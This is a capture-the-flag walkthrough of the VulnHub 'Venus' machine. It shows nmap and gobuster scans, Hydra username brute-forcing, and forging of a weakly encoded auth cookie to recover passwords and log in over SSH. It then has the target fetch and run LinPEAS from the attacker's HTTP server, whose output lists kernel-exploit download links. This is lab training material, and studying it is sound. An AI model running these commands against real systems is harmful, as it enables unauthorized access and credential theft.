Table of Contents
Hello everyone! Welcome to my latest video. Today, we'll be exploring a vulnerable machine called " Venus " from " The Planet " series. This machine is classified as " Medium " difficulty.
To begin, visit the VulnHub website and download the " Venus " image.
.png)
If you're not
familiar with VulnHub, take a look at our VulnHub playlist for some useful
tutorials.
Settings Up
Once you've downloaded
the image, the next step is setting up the server in VirtualBox. This process
is quite simple and involves importing the OVA file into VirtualBox using the
"
import appliance
" feature.
Importing the OVA file
into VirtualBox is a straightforward process. Here's how to do it:
Double-click on the OVA image, which will automatically launch the virtual box and open a review widow.
.png)
Now, review the appliance details and settings. You can adjust them as needed and then Click " Finish " to start the import.
.png)
Once the import is finished, you'll see the "Venus" vulnerable machine listed in the VirtualBox Manager under the VulnHub group.
.png)
Select the virtual machine, go to
"Settings," and change the network adapter to "
Host-only
adapter
."
.png)
It's important to ensure that both your Kali Linux machine (used for attacks) and the vulnerable machine are connected to the same network, so make sure they're both connected via the host-only adapter. Now, it’s time to start the VM.
Now, you'll notice that our Vulnerable Machine is ready, with a login prompt awaiting.
.png)
Let's dive
into the fun!
Enumeration
Identify the Target IP address
The initial step in our attack is enumeration, which involves identifying the IP address of our target machine using NetDiscover. To execute this, open a terminal and run " netdiscover -i " followed by specifying the network interface name, which in this case is "eth1."
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.97.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.95.1 0a:00:27:00:00:0d 1 60 Unknown vendor
192.168.95.2 08:00:27:f8:73:9b 1 60 PCS Systemtechnik GmbH
192.168.95.15 08:00:27:18:54:5e 1 60 PCS Systemtechnik GmbH
From the scan results, we've obtained our
target IP address: "
192.168.95.15
."
Discover the open ports using Nmap
Next, we'll conduct a network scan to identify open ports, a crucial step in the enumeration process. This helps us understand the attack surface and strategize targeted attacks. We'll use the popular Nmap tool for this task. Run " nmap -sC -sV < the IP address>.
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.15 -Pn
In this command, " -sC " is used to perform a script scan using the default set of scripts, while " -sV " enables version detection, allowing us to identify which versions are running on which port.
Use the
-
Pn
option, to skip pinging.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-22 00:37 IST
Nmap scan report for 192.168.95.15
Host is up (0.0011s latency).
Not shown: 987 filtered tcp ports (no-response), 11 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.5 (protocol 2.0)
| ssh-hostkey:
| 256 b0:3e:1c:68:4a:31:32:77:53:e3:10:89:d6:29:78:50 (ECDSA)
|_ 256 fd:b4:20:d0:d8:da:02:67:a4:a5:48:f3:46:e2:b9:0f (ED25519)
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.9.5
|_http-title: Venus Monitoring Login
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Date: Tue, 21 May 2024 19:07:56 GMT
| Server: WSGIServer/0.2 CPython/3.9.5
| Content-Type: text/html; charset=utf-8
| X-Frame-Options: DENY
| Content-Length: 626
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| <html>
| <head>
| <title>Venus Monitoring Login</title>
| <style>
| .aligncenter {
| text-align: center;
| label {
| display:block;
| position:relative;
| </style>
| </head>
| <body>
| <h1> Venus Monitoring Login </h1>
| <h2>Please login: </h2>
| Credentials guest:guest can be used to access the guest account.
| <form action="/" method="post">
| <label for="username">Username:</label>
| <input id="username" type="text" name="username">
| <label for="password">Password:</label>
| <input id="username" type="text" name="password">
| <input type="submit" value="Login">
| </form>
| </body>
|_ </html>
|_http-server-header: WSGIServer/0.2 CPython/3.9.5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=5/22%Time=664CF10E%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,363,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Tue,\x2021\x20May\x
SF:202024\x2019:07:56\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.9
SF:\.5\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:
SF:\x20DENY\r\nContent-Length:\x20626\r\nX-Content-Type-Options:\x20nosnif
SF:f\r\nReferrer-Policy:\x20same-origin\r\n\r\n<html>\n<head>\n<title>Venu
SF:s\x20Monitoring\x20Login</title>\n<style>\n\.aligncenter\x20{\n\x20\x20
SF:\x20\x20text-align:\x20center;\n}\nlabel\x20{\n\x20\x20\x20\x20display:
SF:block;\n\x20\x20\x20\x20position:relative;\n}\n</style>\n</head>\n<body
SF:>\n<h1>\x20Venus\x20Monitoring\x20Login\x20</h1>\n<h2>Please\x20login:\
SF:x20</h2>\nCredentials\x20guest:guest\x20can\x20be\x20used\x20to\x20acce
SF:ss\x20the\x20guest\x20account\.\n<form\x20action=\"/\"\x20method=\"post
SF:\">\n\x20\x20\x20\x20<br\x20/>\n\x20\x20\x20\x20<label\x20for=\"usernam
SF:e\">Username:</label>\n\x20\x20\x20\x20<input\x20id=\"username\"\x20typ
SF:e=\"text\"\x20name=\"username\">\n\x20\x20\x20\x20<br\x20/>\n\x20\x20\x
SF:20\x20<label\x20for=\"password\">Password:</label>\n\x20\x20\x20\x20<in
SF:put\x20id=\"username\"\x20type=\"text\"\x20name=\"password\">\n\x20\x20
SF:\x20\x20<br\x20/>\n\x20\x20\x20\x20<input\x20type=\"submit\"\x20value=\
SF:"Login\">\n</form>\n\n</body>\n</html>\n")%r(HTTPOptions,363,"HTTP/1\.1
SF:\x20200\x20OK\r\nDate:\x20Tue,\x2021\x20May\x202024\x2019:07:56\x20GMT\
SF:r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.9\.5\r\nContent-Type:\x20te
SF:xt/html;\x20charset=utf-8\r\nX-Frame-Options:\x20DENY\r\nContent-Length
SF::\x20626\r\nX-Content-Type-Options:\x20nosniff\r\nReferrer-Policy:\x20s
SF:ame-origin\r\n\r\n<html>\n<head>\n<title>Venus\x20Monitoring\x20Login</
SF:title>\n<style>\n\.aligncenter\x20{\n\x20\x20\x20\x20text-align:\x20cen
SF:ter;\n}\nlabel\x20{\n\x20\x20\x20\x20display:block;\n\x20\x20\x20\x20po
SF:sition:relative;\n}\n</style>\n</head>\n<body>\n<h1>\x20Venus\x20Monito
SF:ring\x20Login\x20</h1>\n<h2>Please\x20login:\x20</h2>\nCredentials\x20g
SF:uest:guest\x20can\x20be\x20used\x20to\x20access\x20the\x20guest\x20acco
SF:unt\.\n<form\x20action=\"/\"\x20method=\"post\">\n\x20\x20\x20\x20<br\x
SF:20/>\n\x20\x20\x20\x20<label\x20for=\"username\">Username:</label>\n\x2
SF:0\x20\x20\x20<input\x20id=\"username\"\x20type=\"text\"\x20name=\"usern
SF:ame\">\n\x20\x20\x20\x20<br\x20/>\n\x20\x20\x20\x20<label\x20for=\"pass
SF:word\">Password:</label>\n\x20\x20\x20\x20<input\x20id=\"username\"\x20
SF:type=\"text\"\x20name=\"password\">\n\x20\x20\x20\x20<br\x20/>\n\x20\x2
SF:0\x20\x20<input\x20type=\"submit\"\x20value=\"Login\">\n</form>\n\n</bo
SF:dy>\n</html>\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.88 seconds
┌──(kali㉿kali)-[~]
└─$
After completing the
network scan, we discovered the presence of two open ports.
- Port 22/TCP is running an SSH service, indicating that gaining access to the server with valid credentials will be straightforward.
- Additionally, Port 8080/TCP is hosting an HTTP-proxy service, suggesting that a vulnerable website may be accessible.
Web Enumeration and directory busting
Let's explore the web content hosted on port 8080. To do this, open a web browser of your choice and navigate to the target's IP address in the URL bar.
.png)
Upon visiting the website, I encountered a
login form along with a hint for login credentials:
guest:guest
. Let's try logging in with these credentials.
.png)
After logging in, it shows a Venus Monitoring web page, displaying the current status of Venus. However, I didn't find any information that could provide a reverse shell.
To further investigate the target URL, we
will conduct directory busting to uncover hidden or hard-to-find directories
and pages. For this task, we'll use the "
gobuster
" tool.
Where,
- gobuster dir is used to instruct gobuster to perform directory busting.
- -u is used to specify the target URL we want to explore.
- -w is used to provide the path to the wordlist containing common directory names to try.
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.95.15:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.95.15:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 0] [--> /admin/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$
Using the directory-busting tool, we have identified an important directory. Let’s visit this admin page.
.png)
Let's try the
guest:guest
credentials to see if they work.
.png)
However, upon attempting to log in
with any username and password, it shows a Server Error.
Even when trying with random usernames and
passwords, we get the same internal server error problem.
This issue seems to occur because we are logged in as the user guest. It appears that the guest user does not have the authority to access the server, resulting in a Server Error (500) .
Let's go back to the home page.
.png)
However,
there is no logout option available. So, let's intercept the request and
response data to see if we can find a way to gain a foothold on the server.
Foothold
Intercept the request using BurpSuite and Find out the Vulnerability
To intercept the request, I will use Burp Suite.
Launch Burp Suite from the Kali Menu. Access the proxy tab and activate intercept mode to capture target requests.
.png)
Now, we need to configure the browser's proxy settings using FoxyProxy. Switch the proxy to Burp Suite within the FoxyProxy extension.
.png)
.png)
Burp Suite will automatically intercept the requested data.
.png)
Send the captured request to the repeater tool in Burp Suite.
.png)
Move on to the "Repeater" tab, and click on " Send " to send the request.
.png)
Upon sending the request, we receive an interesting response.
.png)
Based on this response, it appears we might have found a vulnerability related to how the authentication token is handled. The details suggest that the auth token in the cookie could be manipulated or exploited.
Now, Let’s break down the potential issues and the type of vulnerability.
Upon analyzing the "
auth
" token in the
cookie, it looks like it is in the form of
Base64 encoding.
When we select the encoded text in Burp
Suite, we get the string
guest:thrfm
.
.png)
Upon further analysis, I found that the
username and password are concatenated as
username:password
. The password part is encrypted using
ROT13. The entire string
username:ROT13(password)
is then Base64 encoded.
.png)
This format reveals something important: the token is not encrypted—it is merely encoded in Base64 , which is easily reversible.
This is a major security flaw. If an
attacker can guess or brute-force the values, they can generate valid tokens
for different users.
Based on this detailed analysis, the
vulnerability in the auth token can be identified as
Insecure Authentication
Token Management. Let’s exploit this vulnerability.
Exploitation ( Insecure Authentication Token Management)
To exploit this vulnerability, we need to capture a valid token.
Enumerate Username using Hydra
But first, we should enumerate the usernames if
possible. Open the URL in a private window. Input an invalid username and a
valid password. As a result, we get an "
Invalid username
" error,
indicating that we can enumerate usernames using a brute-force attack.
For this purpose, I am here using Hydra. Open a new terminal, and type the following command:
┌──(kali㉿kali)-[~]
└─$ hydra -L /usr/share/wordlists/rockyou.txt -p pass -s 8080 192.168.95.15 http-post-form "/:username=^USER^&password^PASS^:Invalid username."
This Hydra command will attempt to log in to the web application at192.168.95.15:8080using the usernames from therockyou.txtwordlist and the passwordpass. It will make an HTTP POST request to the root path/, submitting each username and the fixed password in the form data. Hydra will check the server's response for the string “Invalid username.” to determine if the login attempt was unsuccessful.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-22 01:31:22
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399/p:1), ~896525 tries per task
[DATA] attacking http-post-form://192.168.95.15:8080/:username=^USER^&password^PASS^:Invalid username.
[STATUS] 3002.00 tries/min, 3002 tries in 00:01h, 14341397 to do in 79:38h, 16 active
[8080][http-post-form] host: 192.168.95.15 login: venus password: pass
[STATUS] 3097.67 tries/min, 9293 tries in 00:03h, 14335106 to do in 77:08h, 16 active
[STATUS] 3110.14 tries/min, 21771 tries in 00:07h, 14322628 to do in 76:46h, 16 active
[STATUS] 3110.40 tries/min, 46656 tries in 00:15h, 14297743 to do in 76:37h, 16 active
[8080][http-post-form] host: 192.168.95.15 login: magellan password: pass
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
┌──(kali㉿kali)-[~]
└─$
Hydra discovers two valid usernames:
venus
and
Magellan
.
Modifying Auth Token with the help of CyberChef
Next, we'll modify the
auth token. For this purpose, we'll use
CyberChef.
- Copy the auth token.
- Paste it into the Input section of CyberChef.
- Drag " From Base64 " to the recipe list to decode the Base64 string.
- The output will display the decoded result.
.png)
Copy this result, modify the username to "
venus," and encode it back
to Base64.
.png)
.png)
Let's revisit the URL in another tab on the browser. Burp Suite will intercept the request again.
.png)
Copy this intercepted request data to the repeater and modify the auth token with the newly generated token. Upon sending the modified request from the repeater, we receive a new cookie.
.png)
Let's decode the new cookie to see if we get something useful.
.png)
It again contains the username and encoded data. The same applies to the user Magellan. Let's decrypt this data using ROT13 to find out the password for each respective password.
guest:guest
venus:venus
magellan:venusiangeology1989
venus:venus
magellan:venusiangeology1989
Now that we have the usernames and passwords, let's try to gain SSH access. Open a new terminal and use the SSH client to attempt a connection.
┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
[email protected]'s password:
Last login: Tue May 21 23:10:26 2024 from 192.168.95.3
[magellan@venus ~]$
Upon accessing the user Magellan, we successfully log in. First, let's check for the user flag. After listing the files and directories, we find the user flag.
[magellan@venus ~]$ ls
user_flag.txt venus_monitor_proj
[magellan@venus ~]$ cat user_flag.txt
[user_flag_e799a60032068b27b8ff212b57c200b0]
[magellan@venus ~]$
With the user flag in hand, let's attempt to access the root flag.
[magellan@venus ~]$ cd /root
-bash: cd: /root: Permission denied
[magellan@venus ~]$
However, we encountered a permission denied error. Our next objective is to acquire root access in order to complete the CTF challenge.
Privilege Escalation
During the process of privilege escalation,
our primary goal is to gather system information and identify any potential vulnerabilities
or misconfigurations that might grant us higher privileges, ultimately allowing
root access.
To start, let's perform a User Permissions Enumeration to analyze the user's rights and privileges on the system. This can be achieved by executing the “ sudo -l ” command.
[magellan@venus ~]$ sudo -l
[sudo] password for magellan:
Sorry, user magellan may not run sudo on venus.
[magellan@venus ~]$
After executing this command, I discovered
that the user "
Magellan
" does not have permission to run sudo
commands.
Enumerating Privilege Escalation using LinPEAS
Next, we will use
LinPEAS, a powerful tool
used to extract various information, including SUID binaries and vulnerabilities,
which can aid in privilege escalation.
To get started, download LinPEAS from its GitHub repository.
PEASS-ng: Latest Release
Check out the latest release of PEASS-ng, a set of scripts to perform privilege escalation on Windows and Linux systems. This release includes new features and improvements for better performance and usability.
Once you have LinPEAS, initiate a Python3 HTTP server.
┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Switch back to the target server and use the wget command to download LinPEAS from the IP address of the machine running the Python3 HTTP server. If you are unsure about the IP address of your host-only adapter, you can use the “ Ifconfig eth1 ” command to find it.
┌──(kali㉿kali)-[~/Downloads]
└─$ ifconfig eth1
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.95.3 netmask 255.255.255.0 broadcast 192.168.95.255
inet6 fe80::a00:27ff:fe7f:da88 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:7f:da:88 txqueuelen 1000 (Ethernet)
RX packets 1932368 bytes 461549289 (440.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2421653 bytes 210171005 (200.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
After successfully downloading LinPEAS on the target server, use the “ ls -al ” command to check if the file exists.
[magellan@venus ~]$ wget "http://192.168.95.3:8000/linpeas.sh"
--2024-05-21 23:16:36-- http://192.168.95.3:8000/linpeas.sh
Connecting to 192.168.95.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 862779 (843K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[================================================>] 842.56K --.-KB/s in 0.01s
2024-05-21 23:16:36 (65.0 MB/s) - ‘linpeas.sh’ saved [862779/862779]
[magellan@venus ~]$ ls -l
total 848
-rw-r--r--. 1 magellan magellan 862779 May 21 22:00 linpeas.sh
-rw-------. 1 magellan magellan 45 May 21 2021 user_flag.txt
drwxrwxr-x. 4 magellan magellan 109 May 21 2021 venus_monitor_proj
[magellan@venus ~]$
Upon inspecting, I discovered that the linpeas.sh file does not have the necessary execution permissions. To resolve this, give the execution permission to the linpeas.sh, file using the “ chmod +x linpeas.sh” command.
[magellan@venus ~]$ chmod +x linpeas.sh
[magellan@venus ~]$ ls -l
total 848
-rwxr-xr-x. 1 magellan magellan 862779 May 21 22:00 linpeas.sh
-rw-------. 1 magellan magellan 45 May 21 2021 user_flag.txt
drwxrwxr-x. 4 magellan magellan 109 May 21 2021 venus_monitor_proj
[magellan@venus ~]$
Once the execution permission is granted, run the linpeas.sh file.
[magellan@venus ~]$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by github.com/PEASS-ng
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 5.12.8-300.fc34.x86_64 ([email protected]) (gcc (GCC) 11.1.1 20210428 (Red Hat 11.1.1-1), GNU ld version 2.35.1-41.fc34) #1 SMP Fri May 28 15:20:54 UTC 2021
User & Groups: uid=1001(magellan) gid=1001(magellan) groups=1001(magellan) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Hostname: venus
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.12.8-300.fc34.x86_64 ([email protected]) (gcc (GCC) 11.1.1 20210428 (Red Hat 11.1.1-1), GNU ld version 2.35.1-41.fc34) #1 SMP Fri May 28 15:20:54 UTC 2021
lsb_release Not Found
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.9.5p2
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/home/magellan/.local/bin:/home/magellan/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin
╔══════════╣ Date & uptime
Tue May 21 23:18:14 BST 2024
23:18:14 up 3:14, 1 user, load average: 0.96, 0.33, 0.16
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
/dev/mapper/fedora_fedora-root / xfs defaults 0 0
UUID=9b284999-7bf6-468c-a942-e8a72d536c39 /boot xfs defaults 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
SHELL=/bin/bash
HISTCONTROL=ignoredups
HOSTNAME=venus
HISTSIZE=0
EDITOR=/usr/bin/nano
PWD=/home/magellan
LOGNAME=magellan
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/home/magellan
LANG=C.UTF-8
HISTFILE=/dev/null
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.m4a=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.oga=01;36:*.opus=01;36:*.spx=01;36:*.xspf=01;36:
SSH_CONNECTION=192.168.95.3 37224 192.168.95.15 22
XDG_SESSION_CLASS=user
SELINUX_ROLE_REQUESTED=
TERM=xterm-256color
LESSOPEN=||/usr/bin/lesspipe.sh %s
USER=magellan
SELINUX_USE_CURRENT_RANGE=
SHLVL=2
XDG_SESSION_ID=4
XDG_RUNTIME_DIR=/run/user/1001
SSH_CLIENT=192.168.95.3 37224 22
which_declare=declare -f
PATH=/home/magellan/.local/bin:/home/magellan/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/sbin:/bin
SELINUX_LEVEL_REQUESTED=
HISTFILESIZE=0
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
MAIL=/var/spool/mail/magellan
SSH_TTY=/dev/pts/0
BASH_FUNC_which%%=() { ( alias;
eval ${which_declare} ) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot "$@"
}
_=/usr/bin/env
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: less probable
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
